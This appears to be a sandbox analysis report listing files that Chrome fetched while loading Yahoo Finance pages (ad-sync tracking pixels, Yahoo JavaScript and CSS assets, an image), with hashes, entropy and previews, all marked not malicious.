                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=gumgum_dbm&google_hm=ZV8zZGY5ZTI0MS1mMmYzLTQxOTQtODQwZi00NDU4MmQ1MDM1ZDk=&gdpr=0&gdpr_consent=&google_redir=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dgdv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=criteo&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=k-BEUaeoxS4PxYTTOk3PCwXjMPskrOZN_C6CAQfQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=1024&google_ula=1641347&google_hm=Nzk3NzYwMzQ0MzQ0NjM3ODU5NQ&google_push=AXcoOmSzEcCFimbTlOeuQq5cuynR12LdMoCWa77bZ_f5rw5uUdO-bjjV09bxESWikbnv7TuQrq7qihCsCRZGZ3Bm1Rci5-n94vOFBg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11901), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.106396238513521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:ggHWnmGW7GECHay2/WINSyAWRvrhAo1ti:ggHWnmGW7GECHaXN9AWR8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:59AE89307F6BE51355E07ACF3994F79B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A9C5474C652DBC6B60B97C6E723E03A399ACA92D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F54AFF9F498AEFB3479AF7D4F67B5ECE9465B24DB28293A1EE7F32A2230E162F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:ED56A2963D8ACCC7E316F10138566AA2BA715384418B106997C6525D016BE61C6B7583227DBDFC28704A71248DC8E21CC0E19E8D77D46FF84A3D143FE471FD63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-loader-2.7.21-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||{},a.wafer.wafers["wafer-loader"]=e())}("undefined"!=typeof self?self:this,function(){return function(a){function e(w){if(r[w])return r[w].exports;var f=r[w]={i:w,l:!1,exports:{}};return a[w].call(f.exports,f,f.exports,e),f.l=!0,f.exports}var r={};return e.m=a,e.c=r,e.d=function(a,r,w){e.o(a,r)||Object.defineProperty(a,r,{configurable:!1,enumerable:!0,get:w})},e.n=function(a){var r=a&&a.__esModule?function(){return a.default}:function(){return a};return e.d(r,"a",r),r},e.o=function(a,e){return Object.prototype.hasOwnProperty.call(a,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"../../manifest.json":function(a,e){a.exports={"wafer-account-switch":{meta:{version:"1.1.7"},modern:{min:"/aaq/wf/wf-account-switch-1.1.7-moder
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=3355&partner_device_id=M20TKYGE-G-LVHB&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1887)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.89167548120845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:a52b4XIXe5DjD2ea++0Zw65LoHmmreHfwPr5PqS4uxnOr5PqTOuFubHA:u2HaPLwAxw1qiIqTrn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:090EE3EFB10F7C13EE65F76EA8E68E72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7849719A8CA1735C34E35AD33D711C2322F47B53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F622C46893A9D62D786D488F93E730FAF65F46B4D8175EA82A4A6490174EFFC6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:22200A563D3921F99A91CA3A1FB0D66FE12D5F3E7650F7F8B2E43E1AA9466C6F6FE5FDDC86CA9F5664B277EF2A44A2E24A503A2F5B14C58F161B9FEF49800ABE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/ErrorMsg.CmzKsgiD.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.no-data.yf-1lk1oh4.yf-1lk1oh4{align-items:center;color:var(--text2);display:flex;flex-direction:column;gap:.688rem;height:6.25rem;justify-content:center}.no-data.sz-medium.yf-1lk1oh4.yf-1lk1oh4{font-size:var(--font-m)}.no-data.sz-large.yf-1lk1oh4.yf-1lk1oh4{font-size:var(--font-l)}.no-data.grayFill.yf-1lk1oh4.yf-1lk1oh4{background-color:var(--surface3);border-radius:var(--border-radius-m);color:var(--text1);font-weight:var(--font-normal);line-height:1.5rem;min-height:11.5rem;padding:var(--space-4);text-align:center;width:100%}.no-data.fullHeight.yf-1lk1oh4.yf-1lk1oh4{height:100%;flex-grow:1}.no-data.bold.yf-1lk1oh4.yf-1lk1oh4{font-weight:var(--font-bold)}.no-data.failsafe.yf-1lk1oh4.yf-1lk1oh4{height:auto;font-size:var(--font-m);font-weight:var(--font-normal);flex-direction:unset;justify-content:flex-start;background-color:var(--surface3);border-radius:var(--border-radius-m);color:var(--text1);padding:var(--space-4)}.no-data.failsafe.yf-1lk1oh4 p.yf-1lk1oh4{text-align:unset}main.fullW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 720x408, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):22754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.991346016161371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:NHZhBh+DNS0OxEZF9A46Z9Uwuhg749IzxR3cX+l0ae9mxXFAvMDMOI:NH7BhX0OWZR6nv74eRsullea1YOI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:44A613DB4129F3124283E227D769B392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:28307AED8FA6D33F5DEAAC13C946FCBD4CEEB856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A3A5977A0C08316DEA33330FB5DDE8853F44B4DCB6D609CBBF43F8D6C4C92A34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:364C12F3E77B7B0894B8F71190DCAD67F1BE183DB7FFFC6D9928D9D07A3542B2F2DD309239AC003C453BF96403B67CF8E563997C57BEFDEC7DD643DF094E2E34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/Dk0BYpDu_E2Bh.3tzsofkQ--~B/Zmk9c3RyaW07aD00MDg7dz03MjA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/0368e4b0-81be-11ef-9f53-7a1ada451b47.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF.X..WEBPVP8 .X.......*....>a,.G$"--.......A..t.b.o..H....c....<.i.c...........~J.....+......+...o..s................y.;........v.......g.............?......{.{.w.o.o...?......s.e.c............Q...7...Ol/._....x..?.......e.G.c.....?..#................N.i..._?_*...K}..)..............7...G./..@@'............~g...V...........h=.....k.....^\..z}..dA-S..w_.5.%....".UG.?.....r...A......k.a...]...W!..&..^.......v.^.~.M..-.M=..ox.%..K..!......C.....'[......S...../.X#5!..U...}..2."Z....^....d.....M.......".@.i....e....T..z53).{5..5Y...K.|o.......[..!..X7.Z$-.Qi.O.7...C.q.).)|..._..<.Jp.s....}....i.2.JO".uOjy...........f.DW.B".U0..0..`^.tI...kc.{.#.f5f3.EN.Nc....$...t.$43.u./..a...n.P..?...__.JA=...?....O.e)..?...~IE..N...8...b6.n...`.T:.h...0&..e, \.!}...l.{.(.y|.....'.,0..cL.uQ._......3......L#V......'...&.4._.....g_P...<[..wo{=h..#.....nt.,.....p..... .J.....B.b ......+!..3...._X.........8..l.b......P.<...5..V=.Kn..?..a..H.M(.#b..t.r3....Gl..B."xgI...-..7.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8353), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1972886663817555
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3XumTufAC6+AjK90NDqU4Pwf+f/OZ00HY+Zy4+X71:3emif3GK90AUhu/hx4+L1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:11CF4F9BFF98FC79F8EECF2894832023
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:92025912195839DD8724CB90840A5E584DD2DD54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2061ABEA33CED95A6B541BD41CAB6EC3FBBD789ACD1A6A93213F98CBA182AD6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9368BAD1C1EBBB82EE69A45D728F5B66643520F828D1AB44A61D227B5408F4C607867DFCF2C8BA43F913E92D26870CE96412E19F46F90C8A95E69FB7BC1C0E34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-benji",[],t):"object"==typeof exports?exports["wafer-benji"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-benji"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1845)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361834466850386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:eyOQjXI+LJKeIlMDT08lh7AfGRp7JBDiXalMDww1q/jYB+oHTM7/:BjXI+LJKexTnlme7PcfN+j7/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B144109278DA8D05E7FE2BE9514F7DC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:28A5E46E1985FB27464B908FFD4DC017220C1871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6C413A341A208FD27EDB6CF154B190F855556AF5EAE610FA8038A3F89D8AFE62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7EE60F956B559436BFDA330FEF0E3E8750D783B9F298A609D977474D3322B9BE33CF6F97D8885BAB0F21CEAA4761A4E60CACA114415C663CABD36FC1692C6AC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as k,c as g,A as b,e as E,d as v,f as I,i as _,B as d,U as m,k as M,u as N,g as S,a as A}from"./scheduler.Dr9AAxFe.js";import{S as T,i as q,t as y,a as B}from"./index.DCSmZEjO.js";import{g as C}from"./spread.CgU5AtxT.js";import{g as h}from"./i13nUtil.C-uBpR7k.js";function D(n){let t,f,u,s;const r=n[7].default,l=g(r,n,n[6],null);let c=[{class:f="topic-link "+n[1]},{"data-testid":n[5]},{href:n[2]},{title:n[3]},n[4]?{"data-sveltekit-reload":""}:{},{"data-ylk":u=h({elm:"navcat",elmt:"link",itc:0,sec:"topics",subsec:"block",...n[0]})}],o={};for(let e=0;e<c.length;e+=1)o=b(o,c[e]);return{c(){t=E("a"),l&&l.c(),this.h()},l(e){t=v(e,"A",{class:!0,"data-testid":!0,href:!0,title:!0,"data-ylk":!0});var a=I(t);l&&l.l(a),a.forEach(_),this.h()},h(){d(t,o),m(t,"yf-nhs2sl",!0)},m(e,a){M(e,t,a),l&&l.m(t,null),s=!0},p(e,[a]){l&&l.p&&(!s||a&64)&&N(l,r,e,e[6],s?A(r,e[6],a,null):S(e[6]),null),d(t,o=C(c,[(!s||a&2&&f!==(f="topic-link "+e[1]))&&{class:f},(!s||a&32)&&{"data-testid":e[5]},(!s||a&4)&&{hr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14774)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):14775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.46987156971267
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:B2rp1uabyuM98lHSL0s+j7GW/ePAxy2xT6U0b28TgtHy7LMV9l3c4b5:B2rp1uabyu3yL0s+/GW/+AxtxT6U0b2P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1DEE7829A691AD67D3FF5D91136D299B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B6D5FC84E428C848F71E28F2D533791FAD6B235C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DDD06B85018DBCD8A4D0C177F6549245FC3BDD8E88CF227B0B2218FBEAE34EEC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C5FF97BB33077F8D832BFDF624CC573CB48747F62270BC32E53D1B152810A9FBA96569829D1A105637DB9F13353C0D73BF50D6F14E4B401AE34D6A6C69DD4B3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Layout.Be1EN6Zi.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ie,p as x,k as z,i as b,y as Se,c as H,e as R,d as N,f as O,F as Re,G as se,u as Q,g as J,a as K,v as Ne,q as E,x as Be,b as M,t as Oe,j as D,h as Te,_ as ce,l as P,m as Le,Q as Me,A as De,B as Fe,U as v,a4 as Ye,r as ue,V as ee,a0 as We}from"./scheduler.Dr9AAxFe.js";import{S as oe,i as ae,g as G,a as u,e as j,t as c,f as _e,c as T,b as q,m as A,d as B}from"./index.DCSmZEjO.js";import{U as qe,g as le,h as Ve,t as de,n as Ue}from"./commonUtil.CI22_Irn.js";import{F as Ge}from"./Footer.CIE1E9_0.js";import{L as Ae}from"./Lazy.DM9NzWSl.js";import{r as re}from"./resizeUtil.BFOdtaWL.js";import{A as je}from"./context.BGtg7DvY.js";import{e as me}from"./each.BExQfwb4.js";import{C as He}from"./close.C3ug6nNR.js";import{E as Qe}from"./error_outline.CkdKfkE_.js";import{I as te}from"./Icon.BSWt_jx8.js";import{q as ge,a as he}from"./index.C_UqkgE3.js";import{r as Je}from"./toast.AFLjoGRH.js";const Ke=s=>({}),be=s=>({resize:re,onResize:s[1]}),Xe=s=>({}),pe=s=>({resize:re,onResize:s[1]});fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (26897)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):26898
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0926407546199846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Jbf6pzro5Y3M50tmqVQUpBxNEZNunjsNc6RwbGZZWh5:Zf6pzro5Yc5XoQUpBxNEZNsoc6RBM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5A7192EC30069FDEC4A5518DD0B25D99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:625417529F59AA6F44572B2E5B5603C36823314F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6D7736873D188536A3090198F1317CDA3594D25510EDA2C7A8A3A4E47EF65561
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:94662CF0F62AA210E63EA3919996DB4A2AA69342194536ACB30E5373FA74D745BC57FEE235E361014374011B9C515DB8CC63BCD086A69AE42CE0099975D52FD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/Dock.DxcyLucb.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.title.yf-1l821ic.yf-1l821ic,.upscaled-title.yf-1l821ic.yf-1l821ic{font-size:var(--font-m);font-weight:var(--font-bold);text-transform:uppercase;width:100%}.title-text.yf-1l821ic.yf-1l821ic{flex-grow:1;font-weight:var(--font-bold)}.container.yf-1l821ic.yf-1l821ic{padding:0;border:0;padding-top:var(--space-4);background-color:var(--surface1);box-shadow:0 1px 2px #0000004d;border-radius:var(--border-radius-m)}.container.clip.yf-1l821ic.yf-1l821ic{text-overflow:clip}header.yf-1l821ic.yf-1l821ic{padding:0 .75rem .6rem}header.yf-1l821ic .title.yf-1l821ic{width:100%}@media only screen and (width >= 768px){.container.yf-1l821ic.yf-1l821ic{padding:.375rem 0}header.yf-1l821ic.yf-1l821ic{padding:0 var(--space-3) var(--space-1)}.no-pb.yf-1l821ic.yf-1l821ic{padding-bottom:0}}@media only screen and (max-width: 767px),(min-width: 1535px){header.hide-upscaled.yf-1l821ic.yf-1l821ic{display:none}.upscaled-title.yf-1l821ic span.title.yf-1l821ic,.upscaled-title.yf-1l821ic span.title-text.yf-1l821ic{font-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
